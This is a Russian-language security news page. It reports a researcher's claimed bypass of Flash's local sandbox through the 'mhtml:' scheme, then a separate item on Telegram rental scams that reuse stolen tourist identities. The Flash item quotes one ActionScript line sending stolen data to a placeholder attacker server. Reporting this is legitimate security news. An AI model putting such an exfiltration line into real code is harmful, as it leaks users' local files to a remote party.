Простой способ обхода «песочницы» Flash

Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

Мошенники крадут личности туристов для обмана других путешественников

Облюбовавшие Telegram мошенники предлагают аренду жилья российским любителям отдыха за рубежом, используя ранее украденные личные данные других обманутых туристов. Тренд уже приобрел массовый характер.

Целью данной аферы является отъем денег под предлогом оплаты брони. Очередное свидетельство подобного мошенничества представлено в телеграм-канале «База».

Задумав поездку в Таиланд, жительница Тулы Анастасия обратилась за помощью к менеджеру из контактов Дарьи Ловчевой. Та предложила несколько вариантов проживания в Пхукете и посоветовала почитать отзывы в созданной ею профильной группе.

После выбора претендентка скинула свои паспортные данные и внесла предоплату в размере 30%. Когда ей сообщили о необходимости уплаты еще 50% стоимости аренды, россиянка заподозрила подвох и потребовала возврат, однако собеседница исчезла из чата.

Как выяснилось, мошеннический сервис гостеприимства объявился в мессенджере в результате кражи личности Дарьи Логачевой, совершенной при аналогичном бронировании тайского жилья. Новоявленная туристка из Тулы теперь переживает, что ее данные тоже могут быть использованы для обмана других путешественников.

Схожим образом злоумышленники крадут деньги у желающих отдохнуть во Вьетнаме, Франции, Италии, Индонезии. Менее изощренные мошеннические схемы, ориентированные на туристов, обычно используют обзвон либо фишинговые сайты, активно плодящиеся перед долгими праздниками и в сезон летних отпусков.

RSS: Новости на портале Anti-Malware.ru